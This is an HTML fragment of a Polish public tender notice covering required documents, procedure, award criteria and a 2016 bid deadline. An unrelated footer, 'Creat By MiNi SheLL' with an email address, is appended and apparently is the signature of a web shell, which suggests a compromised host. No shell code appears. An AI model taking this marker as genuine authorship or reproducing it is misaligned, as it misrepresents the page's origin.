                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Formularz oferty (załącznik nr 2 do SIWZ). 2.Kosztorys ofertowy wykonany na podstawie przedmiaru robót (załącznik nr 1 do SIWZ).
2.Pełnomocnictwo do podpisania oferty, jeśli to nie wynika z innych dokumentów dołączonych do oferty.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Udzielona gwarancja </td><td>20</td></tr><tr><td>Termin wykonania </td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com